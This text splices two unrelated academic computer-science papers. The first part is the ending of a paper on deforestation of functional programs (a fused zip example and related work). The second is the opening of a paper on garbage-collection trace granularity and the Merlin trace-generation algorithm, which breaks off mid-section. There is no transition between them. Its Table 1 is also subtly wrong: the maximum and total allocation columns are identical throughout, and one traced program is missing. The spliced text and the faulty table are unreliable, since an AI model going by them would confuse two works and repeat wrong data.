y)) \] \[ \text{IsNilOr}\ ((i, x), (j, y)) = (0, (x, y)) \] \[ \text{iterate}\ f = \llbracket \text{in}_{L_A}, \text{id}, \text{inr} \circ (\text{id} \vartriangle f) \rrbracket \] Then the composition \( \text{zip} \circ ((\text{iterate}\ f) \times \text{zip}) \) is transformed to: \[ \text{zip} \circ ((\text{iterate}\ f) \times \text{zip}) = h \] where \[ h\,(x, (\text{Nil}, zs)) = \text{Nil} \\ h\,(x, (ys, \text{Nil})) = \text{Nil} \\ h\,(x, (ys, zs)) = \text{Cons}((x, (\text{hd}\ ys, \text{hd}\ zs)), h(f\,x, (\text{tl}\ ys, \text{tl}\ zs))) \] In [GLPJ93] \( \text{zip} \) was discussed as an illustration of the most serious limitation of their method. It is clear from this example that our transformation successfully lifts that limitation: both input lists to \( \text{zip} \) have been deforested.
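The fused recursion \( h \) for \( \text{zip} \circ ((\text{iterate}\ f) \times \text{zip}) \) can be sketched as a simple Python loop (our own transcription of the recursive definition above; the function name is invented):

```python
# Fused zip . ((iterate f) x zip): consume both lists in lock-step while
# advancing the seed x. Neither iterate's infinite list nor the inner zip's
# pair list is ever built -- a strict language could not even run the
# unfused pipeline, since iterate alone diverges.
def zip_iterate_zip(f, x, ys, zs):
    out = []
    while ys and zs:
        out.append((x, (ys[0], zs[0])))
        x, ys, zs = f(x), ys[1:], zs[1:]
    return out
```

The result has one element per position at which both input lists are non-empty, pairing the current iterate value with the heads of the two lists.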
5 Related Work Deforestation was first proposed by Wadler in [Wad88] as an automatic transformation to remove unnecessary intermediate data structures. The class of programs his algorithm can treat is characterized as treeless programs, a subset of first-order programs. Based on the observation that some intermediate data structures of basic types (e.g. integers, characters, etc.) need not be removed, Wadler developed the blazing technique to handle such terms. He also discusses applying his method to some higher-order programs whose higher-order functions can be treated as macros. Our method works on a much wider class of higher-order programs, and it need not expand them into first-order form. It is also easy to control which types of intermediate data structures are to be removed with our method. The fusion transformation proposed by Chin ([Chi92]) generalizes deforestation to make it applicable to all first-order programs. Combining it with his higher-order removal technique, his algorithm can take any first-order or higher-order program as its input. Inspired by Wadler's blazing deforestation, Chin devised a double annotation scheme for safe fusion to recognize and skip over terms to which his techniques do not apply. Because his method basically annotates non-treeless subterms, the improvement over Wadler's method comes from the power of higher-order removal. Our method accepts the example of higher-order removal in his paper and successfully transforms it to the same first-order program. Moreover, the example program \texttt{sizet} (defined as \texttt{length} composed with \texttt{flatten} on binary trees), which cannot be handled by Chin's method without assuming an extra law relating \texttt{length} and \texttt{append}, is naturally deforested by our method without any extra laws.
In [FSZ94] Fegaras, Sheard and Zhou extend their normalization algorithm of [SF93] to more general fold programs which recurse over multiple inductive structures simultaneously, such as \texttt{zip} or \texttt{nth}. Because our method always works at the function level and explicitly manipulates the functors, it is easy to give symmetric definitions to functions like \texttt{zip}. Sørensen ([Sør94]) applies a tree grammar-based data-flow analysis to put annotations on programs that guarantee termination of deforestation for a wider class of first-order programs than Chin's method. The grammar is used to approximate the set of terms that the deforestation algorithm encounters, and successfully locates the increasing (accumulating) parameters which could be the source of infinite unfolding. Sørensen, Glück and Jones ([SGJ94]) examine four different transformation methods (Partial Evaluation, Deforestation, Supercompilation and Generalized Partial Computation [FNT91, Tak91]) and discuss the differences in the transformational power of each method. Because each method is defined syntactically for a different language, it is not easy to compare them without losing the insights of each method. Calculation-based transformations provide a better device for such comparative study. Acknowledgments We are grateful to Lambert Meertens, Kieran Clenaghan and Fer-Jan de Vries for providing encouragement and valuable feedback for this research. Many thanks also to Leonidas Fegaras, Zhenjiang Hu, Hideya Iwasaki, Ross Paterson and Masato Takeichi for their comments on the draft of this paper. References
Error-Free Garbage Collection Traces: How to Cheat and Not Get Caught Matthew Hertz† Kathryn S. McKinley‡ J Eliot B Moss† Stephen M Blackburn‡ Darko Stefanović§ † Dept. of Computer Science University of Massachusetts Amherst, MA 01003 {hertz,steveb,moss}@cs.umass.edu ‡ Dept. of Computer Science University of Texas at Austin Austin, TX, 78712 mckinley@cs.utexas.edu § Dept. of Computer Science University of New Mexico Albuquerque, NM 87131 darko@cs.unm.edu ABSTRACT Programmers are writing a large and rapidly growing number of programs in object-oriented languages such as Java that require garbage collection (GC). To explore the design and evaluation of GC algorithms quickly, researchers are using simulation based on traces of object allocation and lifetime behavior. The brute force method generates perfect traces using a whole-heap GC at every potential GC point in the program. Because this process is prohibitively expensive, researchers often use granulated traces by collecting only periodically, e.g., every 32K bytes of allocation. We extend the state of the art for simulating GC algorithms in two ways. First, we present a systematic methodology and results on the effects of trace granularity for a variety of copying GC algorithms. We show that trace granularity often distorts GC performance results compared with perfect traces, and that some GC algorithms are more sensitive to this effect than others. Second, we introduce and measure the performance of a new precise algorithm for generating GC traces which is over 800 times faster than the brute force method. Our algorithm, called Merlin, frequently timestamps objects and later uses the timestamps to reconstruct precisely when they died. It performs only periodic garbage collections and achieves high accuracy at low cost, eliminating any reason to use granulated traces. 1. 
INTRODUCTION

While languages such as LISP and Smalltalk have always used garbage collection (GC), the dramatic increase in the number of people writing programs in Java and other modern languages has seen a corresponding [...] results. Section 6 then introduces our new trace generation algorithm and describes how it improves on the existing algorithm. Section 7 presents and analyzes results from the new tracing algorithm. Finally, Section 8 presents related studies and Section 9 summarizes this study.

This work is supported by NSF ITR grant CCR-0085792, NSF grant ACI-9982028, NSF grant EIA-9726401, DARPA grant 5-21425, DARPA grant F33615-01-C-1892 and IBM. Any opinions, findings, conclusions, or recommendations expressed in this material are the authors' and do not necessarily reflect those of the sponsors.

2. BACKGROUND

Three concepts are central to understanding this research: garbage collection, garbage collection traces, and garbage collection trace granularity.

2.1 Garbage Collection

Garbage collection automates the reclamation of heap objects that are no longer needed. While a wide variety of systems use garbage collectors, we assume a system that uses an implicit-free environment to keep our explanations simple, i.e., an explicit new command allocates objects, but there is no free command. Instead, an object is removed from the heap during a GC when the collector determines that the object is no longer reachable. Since, without additional information, GCs cannot know which objects the program will use in the future, a garbage collector conservatively collects only objects it determines the program cannot reach and therefore cannot use now or in the future. To determine reachability, GCs begin at a program's roots. The roots contain all the pointers from outside of the heap into the heap, such as the program stack and static variables. Any objects in the heap not in the transitive closure of these pointers are unreachable.
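To make the reachability definition concrete, here is a minimal sketch, assuming a toy heap represented as a mapping from object ids to the ids their pointer fields reference (the names `reachable` and `heap` are ours, not the paper's):

```python
# Sketch: reachability as the transitive closure of the root set.
# `heap` maps an object id to the ids its pointer fields reference;
# this representation is illustrative, not from the paper.

def reachable(roots, heap):
    """Return the set of object ids reachable from the roots."""
    marked = set()
    worklist = list(roots)
    while worklist:
        obj = worklist.pop()
        if obj in marked:
            continue
        marked.add(obj)                     # mark the object live
        worklist.extend(heap.get(obj, ()))  # follow its outgoing pointers
    return marked

heap = {"A": ["B"], "B": ["C"], "C": [], "D": ["A"]}
print(reachable({"A"}, heap))  # -> {'A', 'B', 'C'} (order may vary); 'D' is garbage
```

Everything outside this set can be reclaimed, which is exactly the conservative criterion the collector applies.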
Since once an object becomes unreachable it remains unreachable (and cannot be updated or used), such objects can be safely removed from the heap. In whole-heap collection, the collector determines the reachability of every object and removes all unreachable objects. Many collectors (e.g., generational collectors) often collect only part of the heap, limiting the work at each collection. Because the collector reclaims only unreachable objects, it must conservatively assume that the regions of the heap not examined contain only live objects. If objects in the unexamined region point to objects in the examined region, the target objects also remain in the heap. Since objects in the uncollected region are not even examined, collectors use write barriers to find pointers into the collected region. Write barriers are instrumentation invoked at every pointer store operation. A write barrier typically tests whether the pointer target is in a region that will be collected before the region containing the pointer source, and records such pointers in some data structure. We assume that every pointer store is instrumented with a write barrier. In many systems this assumption does not hold for root pointers, such as those in the stack. In this case, we enumerate the root pointers at each potential GC point, which is much less expensive than a whole-heap collection and can be further optimized using the techniques of Cheng et al. [6].

2.2 Copying Garbage Collection Algorithms

We use four copying garbage collection algorithms for our evaluation: a semi-space collector, a fixed-nursery generational collector [15], a variable-sized nursery generational collector [3], and an Older-First collector [13]. We briefly describe each of these here for the reader who is unfamiliar with the GC literature.

A semi-space collector (SS) allocates into From space using a bump pointer.
When it runs out of space, it collects this entire region by finding all reachable objects and copying them into a second To space. The collector then reverses From and To space and continues allocating. Since all objects in From space may be live, it must reserve half the total heap for the To space, as do the generational collectors that generalize this collector. A fixed-nursery (FN) two generation collector divides the From space of the heap into a nursery and an older generation. It allocates into the nursery. When the nursery is full, it collects the nursery and copies the live objects into the older generation. It repeats this process until the older generation is also full. It then collects the nursery together with the older generation and copies survivors into the To space (the older generation). A variable-size nursery collector (VN) also divides the From space into a nursery and an older generation, but does not fix their boundary. In steady state, the nursery is some fraction of From space and when it fills up, VN copies live objects into the older fraction. The new nursery size is reduced by the size of the survivors. When the nursery gets too small, VN collects all of From space. The Older-First collector (OF) organizes the heap in order of object age. It collects a fixed size window that it slides through the heap from older to younger objects. In the steady state and when the heap is full, OF collects the window, returns the free space to the nursery, compacts the survivors, and then positions the window for the next collection over objects just younger than those that survived. If the window bumps into the allocation point, it resets the window to the oldest end of the heap. It need only reserve space the size of a window for a collection. 
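As an illustration of the SS scheme just described, the following sketch performs one semi-space collection over the same kind of toy heap mapping; forwarding pointers and the bump-pointer allocator are elided, and all names are ours, not the paper's:

```python
# Sketch of a semi-space (SS) collection: copy the reachable objects
# from From space into To space, then treat To space as the new From
# space. The object/heap representation is illustrative only.

def ss_collect(roots, from_space):
    """from_space: dict id -> list of referenced ids. Returns the new
    From space (the old To space) holding only the survivors."""
    to_space = {}
    worklist = list(roots)
    while worklist:                      # scan survivors transitively
        obj = worklist.pop()
        if obj in to_space:
            continue                     # already copied (forwarded)
        to_space[obj] = from_space[obj]  # "copy" the object
        worklist.extend(from_space[obj])
    return to_space                      # spaces are now flipped

heap = {"A": ["B"], "B": [], "dead": ["A"]}
print(ss_collect({"A"}, heap))  # {'A': ['B'], 'B': []}
```

The generational and Older-First collectors refine this basic copying step by choosing *which* region to scan, rather than changing the copying mechanism itself.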
2.3 Garbage Collection Traces

A garbage collection trace is a chronological recording of every object allocation, heap pointer update, and object death (an object becoming unreachable) over the execution of a program. These events include all the information that a memory manager needs for its processing. Processing an object allocation requires an identifier for the new object and how much memory it needs; pointer update records include the object and field being updated and the new value; object death records identify which object became unreachable. These events comprise the minimum amount of information that GC simulations need.² Simulators use a single trace file to analyze any number of different GC algorithms and optimizations applied to a single program run. The trace contains all the information to which a garbage collector would actually have access in a live execution and all of the events upon which the collector may be required to act, independent of any specific GC implementation. Traces do not record all aspects of program execution. Thus, researchers can simulate a single implementation of a garbage collector with traces from any number of different languages. For these reasons, GC simulators are useful when prototyping and evaluating new ideas. Since (non-concurrent) garbage collection is deterministic, simulations can return exact results for a number of metrics. When accurate trace files are used as input, results from a GC simulator can be relied upon, making simulation attractive and accurate traces critical.

Garbage collection trace generators must be integrated into the memory manager of the interpreter or virtual machine in which the program runs. If the program is compiled into a stand-alone executable, the compiler back end must generate code for trace generation instead of ordinary memory management code at each object allocation point and pointer update. The trace can log pointer updates by instrumenting pointer store operations; this instrumentation is particularly easy if the language and GC implementation use write barriers, since it then simply instruments those write barriers. A reachability analysis of the heap from the program's root set determines object deaths. The common brute force method of trace generation determines reachability by performing a whole-heap garbage collection. Since the garbage collector marks and processes exactly the reachable objects, any objects left unmarked (unprocessed) at the end of the collection must be unreachable, and the trace generator produces object death records for them.

For a perfectly accurate trace, we must analyze the program at each point in the trace at which a garbage collection could be invoked. For most GC algorithms, collection may be needed whenever memory may need to be reclaimed: immediately before allocating each new object, assuming only object allocation triggers GC. Thus, brute force trace generators incur the expense of collecting the entire heap prior to allocating each object. If the simulated GC algorithms allow more frequent garbage collection invocations, the reachability analyses must be undertaken more often as well. These frequent reachability analyses are also difficult because of the stress they place on the system and the way they expose errors in the interpreter or virtual machine.

¹The obvious generalization to $n$ generations applies.
²While some optimizations and collectors may need additional information, it can be added to the trace file so that the majority of simulations do not need to process it. Since most GC algorithms use only this information, here we assume only this minimal information.

2.4 Garbage Collection Trace Granularity

A common alternative to generating perfect traces is to perform the reachability analysis only periodically.
Limiting the analysis to every $N$ bytes of allocation makes the trace generation process faster and easier. It also means the trace is guaranteed accurate only at those specific points; the rest of the time it may over-estimate the set of live objects. Any simulation should assume that objects become unreachable only at the accurate points. The granularity of a trace is the period between these moments of accurate death knowledge. Although trace granularity is related to time, its most appropriate unit of measurement depends on how GC is triggered. Since most collectors perform garbage collection only when memory is exhausted, the most natural measure of granularity is the number of bytes allocated between accurate points in the trace.

3. EXPERIMENTAL DESIGN

This section describes our methodology for evaluating experimentally the effect of trace granularity on simulating the four copying garbage collectors. We start by describing our simulator and programs. We then describe how to deal with granularity in simulation.

3.1 Simulator Suite

For our trace granularity experiments, we used gc-sim, a GC simulator suite from the University of Massachusetts with front-ends for Smalltalk and Java traces. In our simulator, we implemented four different garbage collection algorithms: SS, FN, VN, and OF, as described in Section 2.2. The first three collectors are in widespread use. For each collector, we simulated eight different From space sizes, from 1.25 to 3 times the maximum size of the live objects within the heap, in increments of 0.25. For FN and VN we simulated each heap size with five different nursery sizes, and for OF with five window sizes. These latter parameters ranged from \( \frac{1}{8} \) to \( \frac{5}{8} \) of From space, in \( \frac{1}{8} \) increments.

3.2 Granularity Schemes

We designed and implemented four different schemes to handle trace granularity.
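Before turning to the schemes, the granulation step itself (Section 2.4) can be sketched as a filter over a perfect trace, delaying each death record to the next point at which a cumulative $N$ bytes have been allocated. The event encoding below is our own assumption, not the paper's trace format:

```python
# Sketch: granulating a perfect trace. Death records are delayed to the
# next accurate point, i.e. the next granule boundary in bytes allocated.
# Event tuples ('alloc', id, size) / ('death', id) are illustrative.

def granulate(trace, granule_bytes):
    """Return a trace whose death records appear only at granule
    boundaries (and at the end of the trace)."""
    out, pending, allocated = [], [], 0
    for event in trace:
        if event[0] == 'alloc':
            allocated += event[2]
            out.append(event)
            if allocated >= granule_bytes:      # accurate point reached
                out.extend(pending)              # emit delayed deaths
                pending = []
                allocated %= granule_bytes
        else:
            pending.append(event)                # delay the death record
    out.extend(pending)                          # flush at end of trace
    return out

trace = [('alloc', 'A', 16), ('death', 'A'), ('alloc', 'B', 16)]
print(granulate(trace, 32))
# 'A' dies in the perfect trace before 'B' is allocated, but the
# granulated trace reports the death only at the 32-byte boundary
```

Between boundaries, such a trace over-estimates the live set, which is exactly the distortion the experiments below measure.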
Each of these schemes works independently of the simulated GC algorithm. They explore the limits of trace granularity by affecting when the collections occur.

Unsynced: When we began this research, our simulator used this naive approach to handling trace granularity: it did nothing; we call this method Unsynced. Unsynced simulations allow a GC to occur at any time in the trace; collections are simulated at the natural collection points for the garbage collection algorithm (such as when the heap or nursery is full). This scheme allows the simulator to run the algorithm as it is designed and does not consider trace granularity when determining when to collect. Unsynced simulations may treat objects as reachable because the object death record has not yet been reached in the trace, even though the object is unreachable. However, they allow a GC algorithm to perform collections at its natural points, unconstrained by the granularity of the input trace.

SyncEarly: The first Synced scheme we call SyncEarly. Figure 1(a) shows how SyncEarly decides when to collect. If, at a point with perfect knowledge, the simulator determines that the natural collection point will be reached within the following period equal to one granule of the trace, SyncEarly forces a GC invocation. SyncEarly always performs a collection at or before the natural point is reached. SyncEarly simulations may perform extra garbage collections, e.g., when the last natural collection point occurs between the end of the trace and what would be the next point with perfect knowledge. But SyncEarly ensures that the simulated heap will never grow beyond the bounds it is given.

SyncLate: The second scheme is SyncLate. Figure 1(b) shows how SyncLate decides when to collect. At a point with perfect knowledge, if SyncLate computes that the natural collection point occurred within the preceding time of one granule of the trace, SyncLate invokes a garbage collection.
SyncLate collects at or after the natural point is reached. SyncLate simulations may GC too few times, e.g., when the last natural collection point occurs between the last point with perfect knowledge and the end of the trace. SyncLate allows the heap and/or nursery to grow beyond their nominal bounds between points with perfect knowledge, but enforces the bounds whenever a collection is completed.

SyncMid: The last Synced scheme is SyncMid. Figure 1(c) shows how SyncMid decides when to collect. SyncMid forces a GC invocation at a point with perfect knowledge if a natural collection point is within half of the trace granularity in the past or future. SyncMid requires a collection at the point with perfect knowledge closest to the natural collection point. By doing this, SyncMid simulations try to balance the times they invoke collections too early against the times they invoke them too late, to achieve results close to the average. SyncMid simulations may, like SyncEarly, perform more or, like SyncLate, perform fewer garbage collections. Between points with perfect knowledge, SyncMid simulations may also require the heap and/or nursery to grow beyond their nominal bounds. However, heap bounds are still enforced immediately following a collection.

Figure 1: When each of the Sync schemes decides to collect. The triangles denote points in the trace with perfect knowledge. The natural collection point is shown as the solid line labeled N. The shaded region is as large as one granule of the trace and shows the region in which garbage collection is allowed. A GC is forced at the point in the trace with perfect knowledge within the shaded region, shown by the arrow labeled G.

4. TRACE GRANULARITY RESULTS

In this section, we present our data analysis and results.
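The decision rules of the three Synced schemes above can be condensed into a single predicate; the sketch below uses our own naming (gc-sim's actual interface is not given in the paper), with positions measured in bytes of allocation:

```python
# Sketch: at an accurate point, decide whether to force a GC whose
# natural collection point is nearby. `accurate` and `natural` are
# positions in bytes allocated; `granule` is the trace granularity.
# Names are ours, not gc-sim's.

def should_collect(scheme, accurate, natural, granule):
    if scheme == 'early':   # collect at or before the natural point
        return accurate <= natural < accurate + granule
    if scheme == 'late':    # collect at or after the natural point
        return accurate - granule < natural <= accurate
    if scheme == 'mid':     # collect at the closest accurate point
        return abs(natural - accurate) <= granule / 2
    raise ValueError(scheme)

# At accurate point 64KB with 32KB granules, a natural point at 80KB:
print(should_collect('early', 64, 80, 32))  # True: within the next granule
print(should_collect('late', 64, 80, 32))   # False: not yet passed
```

Unsynced simply never consults such a predicate and collects wherever the algorithm's natural point falls.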
4.1 GC Simulation Metrics

During a garbage collection simulation we measure a number of metrics: the number of collections invoked, the mark/cons ratio, the number of interesting stores, and the space-time product. Since the metrics we consider are deterministic, simulators can return these results quite accurately. The mark/cons ratio is the number of bytes that the collector copied divided by the number of bytes allocated. The ratio serves as a measure of the amount of work done by a copying collector. Higher mark/cons ratios suggest an algorithm will need more time, because it must process and copy more objects.

Another metric we report is the number of interesting stores for a program run. Since many garbage collectors do not collect the entire heap, they use a write barrier to find pointers into the region currently being collected (as we mentioned in Section 2.1). The write barrier instruments pointer store operations to determine if the pointer is one of which the garbage collector needs knowledge. The number of pointer stores, and the cost to instrument each of these, does not vary in a program run, but the number of pointer stores that must be remembered varies between GC algorithms at run time and will affect their performance.

We also measure the space-time product. While this is not directly related to the time required by an algorithm, it measures another important resource: space. This metric is the sum of the number of bytes used by objects within the heap at each allocation point multiplied by the size of the allocation (i.e., the integral of the number of bytes used by objects within the heap with respect to time measured in bytes of allocation). Since the number of bytes allocated does not vary between different algorithms, this metric measures how well an algorithm manages the size of the heap throughout the program execution. None of these metrics is necessarily sufficient in itself to determine how well an algorithm performs.
Algorithms can perform better in one or more of the metrics at the expense of another. The importance of considering the totality of the data can be seen in the models developed that combine the data to determine the total time each algorithm needs [13].

4.2 GC Traces

We used 15 GC traces in this study. Nine of the traces are from the Jalapeño JVM (now known as the Jikes RVM) [2, 1], a compiler and run-time system for Java in which we implemented our trace generator. The nine Java traces are: bloat-bloat (Bloat [11] using its own source code as input), two different configurations of Olden health (5 256 and 4 512), and SPEC compress, jess, raytrace, db, javac, and jack. We also have six GC traces from the University of Massachusetts Smalltalk Virtual Machine. The Smalltalk traces are: lambda-fact5, lambda-fact6, tomcatv, heapsim, tree-replace-random, and tree-replace-binary. More information about the traces appears in Table 1.

We implemented a filter that takes perfect traces and a target value and outputs traces with the targeted level of granularity. We first generated perfectly accurate traces for each of the programs; then our filter generated 10 versions of each trace with granularity ranging from 1KB to 2048KB. Our simulator then used the perfect and granulated traces as input.

4.3 Analysis

We began by simulating all combinations of program trace, trace granularity, granularity scheme, GC algorithm, and From space and nursery (window) size. We record the four metrics from above for each combination. Table 2 shows an example of the simulator output. With this large population of data (approximately 600 simulations for each GC/granularity scheme combination), we performed a detailed statistical analysis of the results. For this analysis, we remove any simulation that required fewer than 10 garbage collections.
In simulations with few GCs, the addition or removal of a single collection can create dramatically different effects, and furthermore the garbage collector would rarely make a difference in the program's total running time. For these reasons, these results would rarely be included in an actual GC implementation study either. We also remove any simulation where the trace granularity equaled 50% or more of the simulated From space size, since trace granularity would obviously impact these results. We prune these cases, since the data would only bolster our claims that granularity is important. In addition, we only include simulations where both the perfect trace and the granulated trace completed. Occasionally, simulations of the granulated trace would complete merely because the simulator expanded the heap and delayed collection until an accurate point. There were also simulations of granulated traces that did not finish because garbage collection was invoked earlier than normal, causing too many objects to be promoted. Because any metrics generated from simulations that did not finish would be incomplete, we did not include them in our analysis. The number of experiments remaining at the 1KB granularity was about 90 for SS, 200 for VN, 250 for FN, and 425 for OF. The number of valid simulations does not vary by more than 2% or 3% until the 32KB granularity. At the 32KB granularity, there are 20% fewer simulations.

Table 1: Traces used in the experiment. Sizes are expressed in bytes.

<table>
<thead>
<tr> <th>Program</th> <th>Description</th> <th>Max. Alloc</th> <th>Total Alloc</th> </tr>
</thead>
<tbody>
<tr> <td>bloat-bloat</td> <td>Bytecode-Level Optimization and Analysis Tool 98 using its own source code as input</td> <td>1 644 117</td> <td>1 644 117</td> </tr>
<tr> <td>Olden Health (5 256)</td> <td>Columbian health market simulator from the Olden benchmark suite, recoded in Java</td> <td>2 337 284</td> <td>2 337 284</td> </tr>
<tr> <td>SPEC 201 compress</td> <td>Compresses and decompresses 20MB of data using the Lempel-Ziv method. From SPECJVM98.</td> <td>8 144 188</td> <td>8 144 188</td> </tr>
<tr> <td>SPEC 202 jess</td> <td>Expert shell system using NASA CLIPS. From SPECJVM98.</td> <td>3 792 856</td> <td>3 792 856</td> </tr>
<tr> <td>SPEC 205 raytrace</td> <td>Raytraces a scene into a memory buffer. From SPECJVM98.</td> <td>5 733 464</td> <td>5 733 464</td> </tr>
<tr> <td>SPEC 209 db</td> <td>Performs a series of database functions on a memory-resident database. From SPECJVM98.</td> <td>10 047 216</td> <td>10 047 216</td> </tr>
<tr> <td>SPEC 213 javac</td> <td>Sun's JDK 1.0.4 compiler. From SPECJVM98.</td> <td>11 742 640</td> <td>11 742 640</td> </tr>
<tr> <td>SPEC 228 jack</td> <td>Generates a parser for Java programs. From SPECJVM98.</td> <td>3 813 624</td> <td>3 813 624</td> </tr>
<tr> <td>lambda-fact5</td> <td>Untyped lambda calculus interpreter evaluating 5! in the standard Church numerals encoding</td> <td>4 500 700</td> <td>4 500 700</td> </tr>
<tr> <td>lambda-fact6</td> <td>Untyped lambda calculus interpreter evaluating 6! in the standard Church numerals encoding</td> <td>7 253 640</td> <td>7 253 640</td> </tr>
<tr> <td>tomcatv</td> <td>Vectorized mesh generator</td> <td>126 096</td> <td>126 096</td> </tr>
<tr> <td>heapsim</td> <td>Garbage collected heap simulator</td> <td>549 504</td> <td>549 504</td> </tr>
<tr> <td>tree-replace-random</td> <td>Builds a binary tree then replaces random subtrees at a fixed height with newly built subtrees</td> <td>49 052</td> <td>49 052</td> </tr>
<tr> <td>tree-replace-binary</td> <td>Builds a binary tree then replaces random subtrees with newly built subtrees</td> <td>39 148</td> <td>39 148</td> </tr>
</tbody>
</table>

Table 2: Simulator output from a fixed-size nursery simulation of Health (4, 512). The top lines are the metrics after six collections, when the differences first become obvious; the bottom lines are the final results of the simulation.

5. TRACE GRANULARITY DISCUSSION

The data in Table 3 are quite revealing about the effects of trace granularity and the usefulness of the different schemes in handling granulated traces. From these data it is clear that the use of granulated traces distorts GC performance results compared with perfect traces. For a majority of the metrics, a granularity of only one kilobyte is enough to cause this distortion! Clearly, trace granularity significantly affects the simulator results.

5.1 Unsynchronized Results

Unsynchronized collections dramatically distort the simulation results. In Table 3, two collectors (SS and OF) have statistically significant differences for every metric at the 1KB granularity. In both cases, the granulated traces copied more bytes, needed more GCs, and used more space.
For both collectors the differences were significant at the 99.9% confidence level or higher (p < 0.001), meaning we would expect similar results in 999 out of 1000 experiments. The generational collectors did not fare much better. Both collectors saw granulated traces producing significantly higher mark/cons ratios than the perfect traces. As one would expect, these distortions grew with the trace granularity. In Unsynchronized simulations, collections may come at inaccurate points in the trace; the garbage collector must process and copy objects that are reachable only because the trace has not reached the next set of death records. Once copied, these objects increase the space-time product.

5.2 Synced Results

Synced simulations tend to require slightly higher granularities than Unsynced before producing significant distortions. However, every Synced scheme significantly distorts the results for each metric for at least one collector. Examining the results from Table 3 and Table 4 reveals a few patterns. Considering all the traces, SyncEarly and SyncLate still produce differences from simulations using perfect traces, but slightly larger trace granularities may be required before the differences become statistically significant. SyncMid has several cases where significant distortions do not appear, but this result is both collector- and metric-dependent. In addition, there are still statistically significant distortions for traces with granularities as small as 1KB. In Table 4, when considering only traces with larger maximum live sizes, Synced simulations provide better estimates of the results from simulating perfect traces. But there still exist significant differences at fairly small granularities. Because Synced simulations affect only when the collections occur, they do not copy unreachable objects merely because the object death record has not been reached. Instead, adjusting the collection point causes other problems.
Objects that are allocated, and those whose death records should occur, between the natural collection point and the Synced collection point are initially affected. Depending on the Synced scheme, these objects may be removed from the heap, or processed and copied, earlier than in a simulation using perfect traces. Once the heap is in error (containing too many or too few objects), it is possible for the differences to be compounded, as the Synced simulation may collect at points even further away (and make different collection decisions) than the simulation using perfect traces. Just as with Unsynced simulations, small initial differences can snowball.

SyncEarly: SyncEarly simulations tend to decrease the space-time products and increase the number of GCs, interesting stores, and mark/cons ratios versus simulations using perfect traces. At smaller granularities, FN produces higher space-time products. Normally, FN copies objects from the nursery because they have not had time to die before collection. SyncEarly exacerbates this situation, collecting even earlier and copying more objects into the older generation than similar simulations using perfect traces. As trace granularity grows, however, this result disappears (the simulations still show significant distortions, but in the expected direction) because the number of points in the trace with perfect knowledge limits the number of possible GCs.

SyncLate: In a similar but opposite manner, SyncLate simulations tend to decrease the mark/cons ratio and the number of collections. As trace granularity increases, these distortions become more pronounced as the number of potential collection points begins to limit the collectors as well. Not every collector produces the same distortion on the same metric, however. FN produces significantly higher mark/cons ratios and more garbage collections at small granularities. While SyncLate simulations allow it to copy fewer objects early on, copying fewer objects causes the collector to delay whole-heap collections. The whole-heap collections remove unreachable objects from the older generation and prevent them from forcing the copying of other unreachable objects in the nursery. The collector eventually promotes more and more unreachable objects, so that it often must perform whole-heap collections soon after nursery collections, boosting both the mark/cons ratio and the number of GCs.

Table 3: Earliest granularity (in KB) at which each metric becomes significantly different, by simulation method and collector. Differences were tested using a two-tailed t-test at the 95% confidence level (p = 0.05).

SyncMid: The best results we found are for SyncMid. From Table 4, the larger From space sizes produce similar results for SyncMid simulations and simulations using perfect traces, even at large granularities. The design of SyncMid tries to balance the times it collects too early against the times it collects too late. As a result, it tends to balance collections that distort the results in one direction against collections that distort them in the other. While this is a benefit, it also makes the effects of trace granularity hard to predict.
Both SyncEarly and SyncLate showed collector-dependent behavior. While we showed that it would not be sound to base conclusions about a new or unknown collector on their results, one could at least predict the direction of their effect on each metric. SyncMid simulations, by comparison, produced biases that depend on both the metric and the collector: when significant differences occur, it is not clear in which direction the metric will be skewed. While the results were very good on the whole, there is still no metric for which every collector returned results without statistically significant distortions.

### 5.3 Trace Granularity Conclusion

From the above, it is clear that trace granularity has a significant impact on the simulated results of garbage collection algorithms. When using traces to compare and measure new GC algorithms and optimizations, there is no clear way to use granulated traces and still have confidence that the results are valid.

### 6. MERLIN TRACE GENERATION

*Life can only be understood backwards; but it must be lived forwards.* —Søren Kierkegaard

In this section we present our new Merlin Trace Generation Algorithm, which generates perfect traces up to 800 times faster than the dominant brute force method of trace generation. Given the speed with which it can generate perfect traces, the Merlin algorithm removes the need to use granulated traces and avoids the issues that their use can cause. The Merlin algorithm has other advantages over brute force trace generation. As discussed in Section 2.4, implementing the latter algorithm is difficult: for brute force to work, all GC and GC-affecting code must be completely error-free, and the system must support whole-heap garbage collection. Our new trace generator works with almost any garbage collection algorithm and stresses the system less. According to Arthurian legend, the wizard Merlin began life as an old man. He then lived backwards in time, dying at the time of his birth.
Merlin’s knowledge of the present was based on what he had already experienced in the future. The Merlin tracing algorithm works in a similar manner. Because it computes when each object died backwards in time, the first time the Merlin trace generation algorithm encounters an object in this calculation is the time of the object’s death; any other possible death times would be earlier in the running of the program (but later in Merlin’s processing), and need not be considered. Merlin, both the mythical character and our trace generator, works in reverse chronological order so that each decision, once made, never has to be revisited. The remainder of this section overviews how Merlin computes when objects transition from reachable to unreachable, gives a detailed explanation of why Merlin works, and discusses implementation issues. Finding object allocations and pointer updates is similar to the brute force approach described earlier; Section 6.4 describes how this works with the Merlin algorithm.

#### 6.1 Merlin Algorithm Overview

The Merlin algorithm improves upon brute force trace generation by computing when objects were last reachable rather than when objects became unreachable. Knowing the last moment an object was reachable, its death time can be easily determined: since time advances in discrete steps, the death time of an object is the time interval immediately following the one in which the object was last reachable. By computing the last time objects are reachable, Merlin needs to perform only occasional garbage collections, saving substantial work. To find when objects are last reachable, we stamp objects with the current time whenever they may transition from reachable to unreachable, i.e., whenever they may lose an incoming reference. If the object later loses another incoming reference (because the earlier update did not leave it unreachable), Merlin simply overwrites the previous timestamp with the current time.
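As a minimal illustration of this timestamping idea, the C sketch below (our own toy structures, not the paper's implementation) overwrites an object's stamp each time it loses an incoming reference, so the stamp ultimately records the last such time:

```c
#include <stddef.h>

/* Hypothetical heap object: the only field Merlin's scheme needs here
 * is a timestamp recording when it last lost an incoming reference. */
typedef struct Object { long timeStamp; } Object;

static long currentTime = 0;    /* time advances in discrete steps */

/* Called whenever *slot is overwritten: the old target loses a reference. */
static void pointerStore(Object **slot, Object *newTarget) {
    currentTime++;
    if (*slot != NULL)
        (*slot)->timeStamp = currentTime;   /* may be overwritten later */
    *slot = newTarget;
}
```

Because later losses simply overwrite earlier stamps, no decision ever needs to be revisited; the final stamp is the candidate last-reachable time from which Merlin's backward pass starts.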
